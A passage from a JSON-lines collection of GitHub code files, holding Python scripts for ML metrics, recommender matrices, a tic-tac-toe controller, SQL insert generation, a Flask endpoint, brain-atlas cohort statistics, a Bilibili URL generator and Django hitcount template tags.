*\n\ndef evaluate(Y_val_hat_pb, Y_val_hat, Y_val, Y_ts_hat_pb, Y_ts_hat, Y_ts, epoch, loss, log_file=None, cv_i=None):\n ''' calculate several metrics and store in cache_pf\n cache_pf: performance metrics will be stored '''\n labels = np.unique(Y_ts)\n f1_vl = round(f1_score(Y_val, Y_val_hat, labels=[0,1,2,3,4], average='macro', zero_division=1), 4)\n f1_ts = round(f1_score(Y_ts, Y_ts_hat, labels=[0,1,2,3,4], average='macro', zero_division=1), 4)\n f1_per_class = f1_score(Y_ts, Y_ts_hat, labels=[0,1,2,3,4], average=None)\n f1_per_class = {a: round(b, 4) for a, b in zip(labels, f1_per_class)}\n kappa = round(cohen_kappa_score(Y_ts, Y_ts_hat), 4)\n acc = round(accuracy_score(Y_ts, Y_ts_hat), 4)\n confusion = confusion_matrix(Y_ts, Y_ts_hat, labels=labels)\n confusion = {a: b for a, b in zip(labels, confusion)}\n ## For Lable Transition Task\n # roc_auc_val = round(roc_auc_score(Y_val, Y_val_hat_pb[:, 1]), 4)\n # roc_auc_ts = round(roc_auc_score(Y_ts, Y_ts_hat_pb[:, 1]), 4)\n # writelog(log_file, f'roc_auc_val: {roc_auc_val}, roc_auc_ts: {roc_auc_ts}')\n\n # For Record\n cache_pf_column = ([\"CV\", \"Epoch\", \" \", \"Valid_F1\", \"Test_F1\", \"Kappa\", \"ACC\", \" \",\n \"Batch\", \"lr\", \"Seq_Length\", \" \",\"Training_Loss\", \" \",\n \"F1_per_Class\", \"Confusion\"])\n cache_pf = [cv_i, epoch+1, \" \", f1_vl, f1_ts, kappa, acc, \" \",\n args.batch, args.lr, args.seq_length, \" \",loss, \" \",\n f1_per_class, confusion]\n\n return cache_pf_column, cache_pf, f1_vl, f1_ts\n\n# f1_per_class = {\"W\": \"{:0.4}\".format(f1_per_class[0]), \"N1\": \"{:0.4}\".format(f1_per_class[1]),\n# \"N2\": \"{:0.4}\".format(f1_per_class[2]),\n# \"N3\": \"{:0.4}\".format(f1_per_class[3]), \"REM\": \"{:0.4}\".format(f1_per_class[4])}\n","repo_name":"ku-milab/CE_SCST","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"73551029539","text":"from utils import *\n\ndef build_user_product_matrix(df_user_product_frequency, matrix_file_path, matrix_name):\n \"\"\"Build and store coo/csr sparse matrix of user-product matrix.\"\"\"\n assert isinstance(df_user_product_frequency, pd.DataFrame)\n assert isinstance(matrix_file_path, str) and isinstance(matrix_name, str)\n matrix_path = os.path.join(matrix_file_path, matrix_name)\n if os.path.exists(matrix_path):\n print_warning('User-product matrix is already existed.')\n return sparse.load_npz(matrix_path).tocsr()\n \n df_user_product_frequency['user_id'] = df_user_product_frequency['user_id'].astype('category')\n df_user_product_frequency['product_id'] = df_user_product_frequency['product_id'].astype('category')\n \n # Define sparse user-product matrix in coo format\n data = df_user_product_frequency['frequency']\n row = df_user_product_frequency['user_id'].cat.codes.copy()\n col = df_user_product_frequency['product_id'].cat.codes.copy()\n user_product_matrix = sparse.coo_matrix((data, (row, col)))\n \n # Store and return the sparse matrix\n if not os.path.exists(matrix_file_path):\n os.mkdir(matrix_file_path) \n sparse.save_npz(matrix_path, user_product_matrix)\n print_success('User-product matrix is stored at %s' % matrix_path)\n return user_product_matrix.tocsr()\n\n\ndef build_tfidf_matrix(tf, matrix_file_path, matrix_name):\n \"\"\"Build tf-idf sparse matrix for product. 'tf' refers to term frequency.\"\"\"\n assert isinstance(tf, sparse.csr.csr_matrix)\n assert isinstance(matrix_file_path, str) and isinstance(matrix_name, str)\n matrix_path = os.path.join(matrix_file_path, matrix_name)\n if os.path.exists(matrix_path):\n print_warning('User-product TF-IDF matrix is already existed.')\n return sparse.load_npz(matrix_path).tocsr()\n\n tf_idf = coo_matrix(tf)\n \n # Get total number of documents (here is user number)\n N = tf.shape[0]\n \n # Calculate IDF (inverse document frequency)\n idf = np.log(N / (1 + np.bincount(tf_idf.col)))\n\n # Since terms don’t show up in many documents, we apply a square root penalty over tf to dampen it.\n tf_idf.data = np.sqrt(tf_idf.data) * idf[tf_idf.col] \n\n # Store and return the sparse matrix\n if not os.path.exists(matrix_file_path):\n os.mkdir(matrix_file_path) \n sparse.save_npz(matrix_path, tf_idf)\n print_success('User-product TF-IDF matrix is stored at %s' % matrix_path)\n return tf_idf.tocsr()\n\n\n# Constants\ndata_path = './data/extracted_dataset'\nstore_path = './data/train_test_data'\ntrain_matrix_path = './data/matrixes'\ntrain_matrix_name = 'user_product_train.npz'\ntrain_tfidf_matrix_name = 'user_product_tfidf_train.npz'\n\n# From processed training data\ndf_product_frequency, df_user_product_frequency, df_productsPerUser_train = get_training_data(data_path, store_path)\n\n# Generate sparse matrix for training\nuser_product_matrix_train = build_user_product_matrix(df_user_product_frequency, train_matrix_path, train_matrix_name)\n\n# Generate tf-idf matrix based on user-product-pair matrix\nuser_product_tfidf_matrix_train = build_tfidf_matrix(user_product_matrix_train, train_matrix_path, train_tfidf_matrix_name)\n","repo_name":"chaitanyaspatil/Instacart_Database_Insights","sub_path":"recommender/src/user_product_matrix.py","file_name":"user_product_matrix.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70791567782","text":"from model.game import Game\nfrom view.game_view import GameView\nfrom model.game_result import GameResult\n\nclass GameController:\n def __init__(self, model: Game, view: GameView) -> None:\n self.model = model\n self.view = view\n\n def run_game(self):\n self.view.display_board()\n\n game_ended = False\n \n while not game_ended:\n self.view.next_player(self.model.current_player)\n row, col = self.view.next_move()\n self.model.make_move(row, col)\n self.view.display_board()\n result = self.model.check_winner()\n if result != GameResult.NONE:\n self.view.display_winner(self.model.current_player, result == GameResult.DRAW)\n game_ended = True\n else:\n self.model.change_player()\n\n ","repo_name":"farhad-ibrahimzade/EECE2140","sub_path":"MVC_DEMO/controller/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12428438334","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 3 23:59:56 2021\n\n@author: maysa\n\"\"\"\n\nimport pandas as pd\n\ndf = pd.read_excel('tbCursos.xlsx')\ncodCurso = df['Curso'].tolist()\nnome = df['Descr'].tolist()\nsubTipo = df['SubTipo'].tolist()\n\nfor i in range(0,234):\n print(\"INSERT INTO Curso(codCurso, nome, codSubTipoCurso) VALUES ('\" + str(codCurso[i]) + \"', '\"+ nome[i] + \"', '\" + str(subTipo[i]) + \"');\")","repo_name":"tommygomez25/BD","sub_path":"Python scripts/Cursos.py","file_name":"Cursos.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41754105361","text":"# -*- coding:utf-8 -*-\nfrom flask import jsonify, request, current_app\nfrom ..models import Info, db\nfrom . import api\nimport os\n\n\n@api.route('/posts/upLoadProfile', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n data = request.get_json()\n name = data.get('name')\n sex = data.get('sex')\n job_title = data.get('job_title')\n work_location_name = data.get('work_location_name')\n taxation_num = data.get('taxation_num')\n\n name_test = Info.query.filter_by(name=name).first()\n if name_test is not None:\n return jsonify({'code': 0, 'message': '已经报到'})\n\n info = Info(\n name=name,\n sex=sex,\n job_title=job_title,\n work_location_name=work_location_name,\n taxation_num=taxation_num,\n check_in=True\n )\n\n try:\n db.session.add(info)\n db.session.commit()\n return jsonify({'code': 1, 'message': '报到成功'})\n except Exception as e:\n db.session.rollback()\n return jsonify({'code': -1, 'message': '报到失败'})\n","repo_name":"ShimakazePr/xggscheckin","sub_path":"app/api/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3642492138","text":"import os\nimport copy\nimport pickle\nimport argparse\nimport skimage.io\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import ttest_ind_from_stats\nimport img3\n\n \nclass Atlas:\n\n # Class variables shared by all instances\n files = {\n \"distance\" : \"/media/athena-admin/FastSSD1/Athena/atlas/ABA_25um_distance_to_surface.tif\",\n \"annotations\" : \"/media/athena-admin/FastSSD1/Athena/atlas/ABA_25um_annotation.tif\",\n \"table\" : \"atlas.tab\"\n }\n\n\n def pprint(self, s):\n print(\"(atlas) %s\" % s)\n\n\n def get_atlas(self, path):\n a = skimage.io.imread(path, plugin='tifffile').T\n return a\n\n\n def get_cropped_atlas(self, path, sample3D):\n \"\"\"\n Assumes that sample is cropped in the Z-direction\n \"\"\"\n a_ = self.get_atlas(path)\n a = np.zeros(np.shape(sample3D))\n a[:,:,:] = a_[:, :, 0:np.shape(sample3D)[2]]\n return a\n\n\n def map_fine_to_coarse_levels(self):\n\n fw = open(\"regions_level1.dat\", 'w')\n fw.write(\"%15s %15s %15s\\n\" % (\"Original ID\", \"Coarse-level ID\", \"Coarse-level name\"))\n\n for i in range(len(self.regions[\"fine_level\"])):\n\n p = copy.deepcopy(self.regions[\"parents\"][i])\n l = copy.deepcopy(self.regions[\"fine_level\"][i])\n\n self.regions[\"fine2coarse_level\"][i] = copy.deepcopy(l)\n self.regions[\"fine2coarse_names\"][i] = self.regions[\"fine_names\"][i]\n\n self.pprint(\"\\n\")\n self.pprint(\"New item:\")\n self.pprint(\"l: %d p: %d\" % (l, p))\n\n while (p != -1) and (p != 997):\n\n idx_ = np.where( self.regions[\"fine_level\"]==p )\n assert(len(idx_)==1)\n idx = idx_[0][0]\n\n p_new = copy.deepcopy( self.regions[\"parents\"][idx] )\n\n if p_new == 997:\n p = p_new\n else:\n l = copy.deepcopy(p)\n p = p_new\n\n self.pprint(\"l: %d p: %d\" % (l, p))\n\n idx_ = np.where( self.regions[\"fine_level\"] == l )\n assert(len(idx_)==1)\n idx = idx_[0][0]\n self.regions[\"fine2coarse_level\"][i] = copy.deepcopy(l)\n self.regions[\"fine2coarse_names\"][i] = copy.deepcopy(self.regions[\"fine_names\"][idx])\n\n\n self.pprint(\"finished while loop. grouped[i]=%d\" % self.regions[\"fine2coarse_level\"][i])\n\n fw.write(\"%15d %15d %s\\n\" % (self.regions[\"fine_level\"][i], self.regions[\"fine2coarse_level\"][i], self.regions[\"fine2coarse_names\"][i]))\n fw.close()\n\n\n # Instance variables unique to each instance\n # self.x\n def __init__(self, sample3D):\n \"\"\"\n Members:\n * self.files\n * self.regions -- dict\n * self.atlas_annotations -- cropped atlas with annotated region IDs\n * self.Nfine -- number of unique fine regions\n * self.Ncoarse -- number of unique coarse regions\n * self.pickle -- path to backup pickle file\n * self.pickle_maps - path to backup file for fine->coarse mapping\n \"\"\"\n\n self.pprint(\"Instantiating atlas...\")\n\n self.regions = {\n \"parents\" : [None],\n \"fine_level\" : [None],\n \"fine_volumes\" : [None],\n \"fine2coarse_level\" : [None],\n \"fine2coarse_names\" : [None],\n \"unique_coarse_level\" : [None], \n \"unique_coarse_vols\" : [None],\n \"unique_coarse_names\" : [None] \n }\n\n self.pickle = \"atlas_info.pickle\"\n self.pickle_maps = \"atlas_fine2coarse_map.pickle\"\n\n table = pd.read_csv(self.files[\"table\"], header=None, sep='\\t', lineterminator='\\n')\n\n self.Nfine = len( table.loc[:,0] )\n\n self.regions[\"parents\"] = copy.deepcopy(table.loc[:,1])\n self.regions[\"fine_level\"] = copy.deepcopy(table.loc[:,0])\n self.regions[\"fine_names\"] = copy.deepcopy(table.loc[:,3])\n self.regions[\"fine_volumes\"] = np.zeros( self.Nfine )\n self.regions[\"fine2coarse_level\"] = np.zeros( self.Nfine )\n self.regions[\"fine2coarse_names\"] = [None] * self.Nfine\n\n self.atlas_annotations = self.get_cropped_atlas(self.files[\"annotations\"], sample3D)\n\n # Compute volume of fine regions\n if os.path.exists(self.pickle):\n with open(self.pickle, 'rb') as handle:\n backup = pickle.load(handle)\n self.regions = copy.deepcopy(backup)\n self.pprint(\"Loaded pickle.\")\n\n else:\n self.pprint(\"Computing volume per region...\")\n\n for i,ID in enumerate(self.regions[\"fine_level\"]):\n idx = np.where(self.atlas_annotations==ID)\n self.regions[\"fine_volumes\"][i] = np.shape(idx)[1]\n\n with open(self.pickle, 'wb') as handle:\n pickle.dump(self.regions, handle, protocol=pickle.HIGHEST_PROTOCOL)\n self.pprint(\"Dumped pickle.\")\n\n\n # Find mapping of fine -> coarse regions\n if os.path.exists(self.pickle_maps):\n with open(self.pickle_maps, 'rb') as handle:\n backup = pickle.load(handle)\n self.regions[\"fine2coarse_level\"][:] = backup[\"fine2coarse_level\"][:]\n self.regions[\"fine2coarse_names\"][:] = backup[\"fine2coarse_names\"][:]\n self.pprint(\"Loaded pickle_maps.\")\n\n else:\n self.pprint(\"Computing fine-to-coarse region mapping...\")\n self.map_fine_to_coarse_levels()\n\n with open(self.pickle_maps, 'wb') as handle:\n pickle.dump(self.regions, handle, protocol=pickle.HIGHEST_PROTOCOL)\n self.pprint(\"Dumped pickle_maps.\")\n\n\n\n # First selection of coarse regions \n self.Ncoarse = len( np.unique(self.regions[\"fine2coarse_level\"]) )\n self.regions[\"unique_coarse_level\"] = np.unique(self.regions[\"fine2coarse_level\"])\n\n # Volume of coarse regions\n self.regions[\"unique_coarse_vols\"] = np.zeros( self.Ncoarse )\n self.regions[\"unique_coarse_names\"] = [None] * self.Ncoarse\n for i,ID in enumerate(self.regions['unique_coarse_level']):\n idx = np.where( self.regions[\"fine2coarse_level\"] == ID )\n self.regions[\"unique_coarse_vols\"][i] = np.sum( self.regions[\"fine_volumes\"][idx] )\n self.regions[\"unique_coarse_names\"][i] = self.regions[\"fine2coarse_names\"][idx[0][0]]\n\n\n # Ignore regions with 0 volume\n idx = self.regions[\"unique_coarse_vols\"]>0\n tmpv = self.regions[\"unique_coarse_vols\"][idx]\n tmpl = self.regions[\"unique_coarse_level\"][idx]\n self.Ncoarse = len(tmpv)\n self.regions[\"unique_coarse_vols\"] = np.zeros( self.Ncoarse )\n self.regions[\"unique_coarse_vols\"][:] = copy.deepcopy(tmpv[:])\n self.regions[\"unique_coarse_level\"] = np.zeros( self.Ncoarse )\n self.regions[\"unique_coarse_level\"][:] = copy.deepcopy(tmpl[:])\n\n tmpn = copy.deepcopy(self.regions[\"unique_coarse_names\"])\n self.regions[\"unique_coarse_names\"] = [None] * self.Ncoarse\n k = 0\n for i,ID in enumerate(idx):\n if ID == True:\n self.regions[\"unique_coarse_names\"][k] = tmpn[i]\n k = k+1\n\n self.pprint(\"Nfine=%d Ncoarse=%d\" % (self.Nfine, self.Ncoarse))\n\n\n\nclass Cohort:\n\n \"\"\"\n An instance would be a list of samples\n of the same group.\n\n self.files\n self.vol\n self.mean\n self.std\n self.densities\n \"\"\"\n\n def pprint(self, s):\n print(\"(cohort) %s\" % s)\n\n\n def __init__(self, files, atlas):\n\n Nfine = atlas.Nfine\n Ncoarse = atlas.Ncoarse\n Nsamples = len(files)\n\n self.files= [None] * Nsamples\n \"\"\"\n vol, mean, std are over the unique COARSE regions\n \"\"\"\n self.vol = np.zeros( (Ncoarse, Nsamples) )\n self.densities = np.zeros( (Ncoarse, Nsamples) )\n self.mean = np.zeros( Ncoarse )\n self.std = np.zeros( Ncoarse )\n\n for i in range(Nsamples):\n self.files[i] = files[i]\n\n\n # Loop over samples of a cohort\n\n # volume of cells in each fine region:\n # ***\n cell_volumes_fine = np.zeros( (Nfine, Nsamples) )\n\n\n for ii,cdir in enumerate(self.files):\n\n backup = \"%s/volume_per_coarse_region.dat\" % cdir\n if os.path.exists(backup):\n self.pprint(\"Loading cell volumes in coarse regions from file.\")\n tmp_ = np.loadtxt(backup, skiprows=1)\n self.vol[:, ii] = tmp_[:,1]\n\n else:\n self.pprint(\"Processing directory: %s\" % cdir)\n\n\n # Volume of cells in each fine region\n self.pprint(\"Computing vol. of cells per fine region...\")\n cells = img3.nrrd_data(\"%s/transformed_cells_eroded.nrrd\" % cdir)\n for i,ID in enumerate(atlas.regions[\"fine_level\"]):\n print(ii, i)\n idx = np.where(atlas.atlas_annotations==ID)\n cell_volumes_fine[i, ii] += np.sum( cells[idx] )\n\n\n # Volume of cells in each coarse region: merge fine into coarse\n self.pprint(\"Computing vol. of cells per coarse region...\")\n for i,ID in enumerate(atlas.regions[\"unique_coarse_level\"]):\n idx = np.where( atlas.regions[\"fine2coarse_level\"] == ID )\n self.vol[i, ii] += np.sum( cell_volumes_fine[idx, ii] )\n\n\n # Export total cell volume per corse region in file\n self.pprint(\"Exporting coarse region volumes.\")\n fw = open(\"%s/volume_per_coarse_region.dat\" % cdir, 'w')\n fw.write(\"%15s %15s\\n\" % (\"Coarse ID\", \"total cell vol.\"))\n for i,ID in enumerate(atlas.regions[\"unique_coarse_level\"]):\n fw.write(\"%d %g\\n\" % (ID, self.vol[i,ii]))\n fw.close()\n\n\n # Cell densities in coarse regions\n with np.errstate(divide='warn', invalid='warn'):\n d = self.vol[:,ii] / atlas.regions[\"unique_coarse_vols\"][:]\n d[np.isnan(d)] = -1\n self.densities[:,ii] = d[:]\n\n\n # Compute averages over samples\n self.mean[:] = np.mean(self.vol, axis=1)\n self.std[:] = np.std( self.vol, axis=1)\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-pd', type=str, nargs='+', required=True, help=\"aligned directory for Placebo \")\n parser.add_argument('-ld', type=str, nargs='+', required=True, help=\"aligned directory for LowDose \")\n parser.add_argument('-hd', type=str, nargs='+', required=True, help=\"aligned directory for HighDose\")\n args = parser.parse_args()\n\n # Read sample shape and instantiate atlas\n cells_ = skimage.io.imread(\"%s/voxelized_R15.tif\" % (args.pd[0]), plugin='tifffile').T\n atlas = Atlas(cells_)\n\n\n # Compute cohort-wise stats\n print(\"Instantiating cohorts...\")\n cohort_P = Cohort(args.pd, atlas)\n cohort_L = Cohort(args.ld, atlas)\n cohort_H = Cohort(args.hd, atlas)\n\n if 0:\n print(\"\\ncohort_P\")\n for i in range(atlas.Ncoarse):\n print(i, cohort_P.densities[i,:], cohort_P.vol[i,:])\n\n print(\"\\ncohort_L\")\n for i in range(atlas.Ncoarse):\n print(i, cohort_L.densities[i,:], cohort_L.vol[i,:])\n\n print(\"\\ncohort_H\")\n for i in range(atlas.Ncoarse):\n print(i, cohort_H.densities[i,:], cohort_H.vol[i,:])\n\n\n # Compute pvalues\n # two-sided t-test pvalue\n ttest_l = ttest_ind_from_stats(mean1=cohort_L.mean, std1=cohort_L.std, nobs1=3, mean2=cohort_P.mean, std2=cohort_P.std, nobs2=3)\n ttest_h = ttest_ind_from_stats(mean1=cohort_H.mean, std1=cohort_H.std, nobs1=3, mean2=cohort_P.mean, std2=cohort_P.std, nobs2=3)\n\n\n # Find non-nan pvalues\n condition = ((ttest_l.pvalue>0)*(ttest_l.pvalue<1)) == 1\n lstatistic = np.where( condition , ttest_l.statistic, 0)\n lpvalues = np.where( condition , ttest_l.pvalue, 0)\n\n condition = ((ttest_h.pvalue>0)*(ttest_h.pvalue<1)) == 1\n hstatistic = np.where( condition , ttest_h.statistic, 0)\n hpvalues = np.where( condition , ttest_h.pvalue, 0)\n\n\n # Split effect\n leffect = np.where(lstatistic>0, +lpvalues, 0)\n leffect = np.where(lstatistic<0, -lpvalues, leffect)\n heffect = np.where(hstatistic>0, +hpvalues, 0)\n heffect = np.where(hstatistic<0, -hpvalues, heffect)\n\n\n # Export CSV file\n\n fw = open(\"pvalues_L1_regions.csv\", 'w')\n\n fw.write(\"%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s\\n \" % (\"Region ID\", \"Region name\", \"Region volume\", \"dens P1\", \"dens P2\", \"dens P3\", \"vol P1\", \"vol P2\", \"vol P3\",\"avg_P\", \"dens LD1\", \"dens LD2\", \"dens LD3\", \"vol LD1\", \"vol LD2\", \"vol LD3\", \"avg_LD\", \"dens HD1\", \"dens HD2\", \"dens HD3\", \"vol HD1\", \"vol HD2\", \"vol HD3\", \"avg HD\", \"pv LD\", \"pv HD\") )\n\n for i in range(atlas.Ncoarse):\n fw.write(\"%g, %s, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g, %g\\n \" % (atlas.regions[\"unique_coarse_level\"][i], atlas.regions[\"unique_coarse_names\"][i].replace(',', ''), atlas.regions[\"unique_coarse_vols\"][i], cohort_P.densities[i,0], cohort_P.densities[i,1], cohort_P.densities[i,2], cohort_P.vol[i,0], cohort_P.vol[i,1], cohort_P.vol[i,2], cohort_P.mean[i], cohort_L.densities[i,0], cohort_L.densities[i,1], cohort_L.densities[i,2], cohort_L.vol[i,0], cohort_L.vol[i,1], cohort_L.vol[i,2], cohort_L.mean[i], cohort_H.densities[i,0], cohort_H.densities[i,1], cohort_H.densities[i,2], cohort_H.vol[i,0], cohort_H.vol[i,1], cohort_H.vol[i,2], cohort_H.mean[i], leffect[i], heffect[i] ) )\n\n fw.close()\n\n\n","repo_name":"aecon/3D-microglia-netoglitazone","sub_path":"post-processing/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":13860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24382782187","text":"# -*- coding: utf-8 -*-\n\nimport pymongo\nimport requests\nfrom bs4 import BeautifulSoup\n\nJanuary, April, july, October = 1, 2, 3, 4\nclient = pymongo.MongoClient('localhost', 27017)\nbilibili = client['bilibili']\nchannels = bilibili['channels']\n\nmonths = [0, 1, 4, 7, 10]\n\n\n# 获取从1970年1月至2017年1月的番剧索引页\ndef get_channel_urls():\n for year in range(1970, 2017):\n for month in range(1, 5):\n channel = 'http://bangumi.bilibili.com/web_api/season/index_global?page=%s&page_size=20&version=0&is_finish=0&start_year={}&tag_id=&index_type=1&index_sort=0&quarter={}'.format(year, month)\n channels.insert_one({\n 'url': channel,\n 'year': year,\n 'month': months[month],\n })\n channels.insert_one({\n 'url': 'http://bangumi.bilibili.com/web_api/season/index_global?page=%s&page_size=20&version=0&is_finish=0&start_year=2017&tag_id=&index_type=1&index_sort=0&quarter=1',\n 'year': 2017,\n 'month': 1,\n })\n\n\nget_channel_urls()","repo_name":"Paul-Pcd/Anime","sub_path":"tools/channel_extracing.py","file_name":"channel_extracing.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"19282122550","text":"from collections import namedtuple\n\nfrom django import template\nfrom django.contrib.contenttypes.models import ContentType\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\nfrom hitcount.utils import get_hitcount_model\n\n\nregister = template.Library()\n\n\ndef get_hit_count_from_obj_variable(context, obj_variable, tag_name):\n \"\"\"\n Helper function to return a HitCount for a given template object variable.\n\n Raises TemplateSyntaxError if the passed object variable cannot be parsed.\n \"\"\"\n error_to_raise = template.TemplateSyntaxError(\n \"'%(a)s' requires a valid individual model variable \"\n \"in the form of '%(a)s for [model_obj]'.\\n\"\n \"Got: %(b)s\" % {'a': tag_name, 'b': obj_variable}\n )\n\n try:\n obj = obj_variable.resolve(context)\n except template.VariableDoesNotExist:\n raise error_to_raise\n\n try:\n ctype = ContentType.objects.get_for_model(obj)\n except AttributeError:\n raise error_to_raise\n\n hit_count, created = get_hitcount_model().objects.get_or_create(\n content_type=ctype, object_pk=obj.pk)\n\n return hit_count\n\n\ndef return_period_from_string(arg):\n \"\"\"\n Takes a string such as \"days=1,seconds=30\" and strips the quotes\n and returns a dictionary with the key/value pairs\n\n \"\"\"\n period = {}\n\n if arg[0] == '\"' and arg[-1] == '\"':\n opt = arg[1:-1] # remove quotes\n else:\n opt = arg\n\n for o in opt.split(\",\"):\n key, value = o.split(\"=\")\n period[str(key)] = int(value)\n\n return period\n\n\nclass GetHitCount(template.Node):\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n # {% get_hit_count for [obj] %}\n if len(args) == 3 and args[1] == 'for':\n return cls(obj_as_str=args[2])\n\n # {% get_hit_count for [obj] as [var] %}\n elif len(args) == 5 and args[1] == 'for' and args[3] == 'as':\n return cls(obj_as_str=args[2],\n as_varname=args[4],)\n\n # {% get_hit_count for [obj] within [\"days=1,minutes=30\"] %}\n elif len(args) == 5 and args[1] == 'for' and args[3] == 'within':\n return cls(obj_as_str=args[2],\n period=return_period_from_string(args[4]))\n\n # {% get_hit_count for [obj] within [\"days=1,minutes=30\"] as [var] %}\n elif len(args) == 7 and args[1] == 'for' and \\\n args[3] == 'within' and args[5] == 'as':\n return cls(obj_as_str=args[2],\n as_varname=args[6],\n period=return_period_from_string(args[4]))\n\n else: # TODO - should there be more troubleshooting prior to bailing?\n raise template.TemplateSyntaxError(\n \"'get_hit_count' requires \"\n \"'for [object] in [period] as [var]' (got %r)\" % args\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_as_str, as_varname=None, period=None):\n self.obj_variable = template.Variable(obj_as_str)\n self.as_varname = as_varname\n self.period = period\n\n def render(self, context):\n hit_count = get_hit_count_from_obj_variable(context, self.obj_variable, 'get_hit_count')\n\n if self.period: # if user sets a time period, use it\n try:\n hits = hit_count.hits_in_last(**self.period)\n except TypeError:\n raise template.TemplateSyntaxError(\n \"'get_hit_count for [obj] within [timedelta]' requires \"\n \"a valid comma separated list of timedelta arguments. \"\n \"For example, ['days=5,hours=6']. \"\n \"Got these instead: %s\" % self.period\n )\n else:\n hits = hit_count.hits\n\n if self.as_varname: # if user gives us a variable to return\n context[self.as_varname] = str(hits)\n return ''\n else:\n return str(hits)\n\n\ndef get_hit_count(parser, token):\n \"\"\"\n Returns hit counts for an object.\n\n - Return total hits for an object:\n {% get_hit_count for [object] %}\n\n - Get total hits for an object as a specified variable:\n {% get_hit_count for [object] as [var] %}\n\n - Get total hits for an object over a certain time period:\n {% get_hit_count for [object] within [\"days=1,minutes=30\"] %}\n\n - Get total hits for an object over a certain time period as a variable:\n {% get_hit_count for [object] within [\"days=1,minutes=30\"] as [var] %}\n\n The time arguments need to follow datetime.timedelta's limitations:\n Accepts days, seconds, microseconds, milliseconds, minutes,\n hours, and weeks.\n\n \"\"\"\n return GetHitCount.handle_token(parser, token)\n\nregister.tag('get_hit_count', get_hit_count)\n\n\nclass WriteHitCountJavascriptVariables(template.Node):\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n if len(args) == 3 and args[1] == 'for':\n return cls(obj_variable=args[2])\n\n else:\n raise template.TemplateSyntaxError(\n 'insert_hit_count_js_variables requires this syntax: '\n '\"insert_hit_count_js_variables for [object]\"\\n'\n 'Got: %s' % ' '.join(str(i) for i in args)\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_variable):\n self.obj_variable = template.Variable(obj_variable)\n\n def render(self, context):\n hit_count = get_hit_count_from_obj_variable(context, self.obj_variable, 'insert_hit_count_js_variables')\n\n js = '\"\n\n return js\n\n\ndef insert_hit_count_js_variables(parser, token):\n \"\"\"\n Injects JavaScript global variables into your template. These variables\n can be used in your JavaScript files to send the correctly mapped HitCount\n ID to the server (see: hitcount-jquery.js for an example).\n\n {% insert_hit_count_js_variables for [object] %}\n \"\"\"\n return WriteHitCountJavascriptVariables.handle_token(parser, token)\n\nregister.tag('insert_hit_count_js_variables', insert_hit_count_js_variables)\n\n\nclass GetHitCountJavascriptVariables(template.Node):\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n if len(args) == 5 and args[1] == 'for' and args[3] == 'as':\n return cls(obj_variable=args[2], as_varname=args[4])\n\n else:\n raise template.TemplateSyntaxError(\n 'get_hit_count_js_variables requires this syntax: '\n '\"get_hit_count_js_variables for [object] as [var_name].\"\\n'\n 'Got: %s' % ' '.join(str(i) for i in args)\n )\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_variable, as_varname):\n self.obj_variable = template.Variable(obj_variable)\n self.as_varname = as_varname\n\n def render(self, context):\n HitcountVariables = namedtuple('HitcountVariables', 'pk ajax_url hits')\n\n hit_count = get_hit_count_from_obj_variable(context, self.obj_variable, 'get_hit_count_js_variables')\n\n context[self.as_varname] = HitcountVariables(\n hit_count.pk, str(reverse('hitcount:hit_ajax')), str(hit_count.hits))\n\n return ''\n\n\ndef get_hit_count_js_variables(parser, token):\n \"\"\"\n Injects JavaScript global variables into your template. These variables\n can be used in your JavaScript files to send the correctly mapped HitCount\n ID to the server (see: hitcount-jquery.js for an example).\n\n {% get_hit_count_js_variables for [object] as [var_name] %}\n\n Will provide two variables:\n [var_name].pk = the hitcount pk to be sent via JavaScript\n [var_name].ajax_url = the relative url to post the ajax request to\n \"\"\"\n return GetHitCountJavascriptVariables.handle_token(parser, token)\n\nregister.tag('get_hit_count_js_variables', get_hit_count_js_variables)\n\n\nclass WriteHitCountJavascript(template.Node):\n\n JS_TEMPLATE = \"\"\"\n\n\"\"\"\n\n JS_TEMPLATE_DEBUG = \"\"\"\n\n\"\"\"\n\n def handle_token(cls, parser, token):\n args = token.contents.split()\n\n if len(args) == 3 and args[1] == 'for':\n return cls(obj_variable=args[2], debug=False)\n elif len(args) == 4 and args[1] == 'for' and args[3] == 'debug':\n return cls(obj_variable=args[2], debug=True)\n else:\n raise template.TemplateSyntaxError(\n 'insert_hit_count_js requires this syntax: '\n '\"insert_hit_count_js for [object]\"\\n'\n '\"insert_hit_count_js for [object] debug\"'\n 'Got: %s' % ' '.join(str(i) for i in args)\n 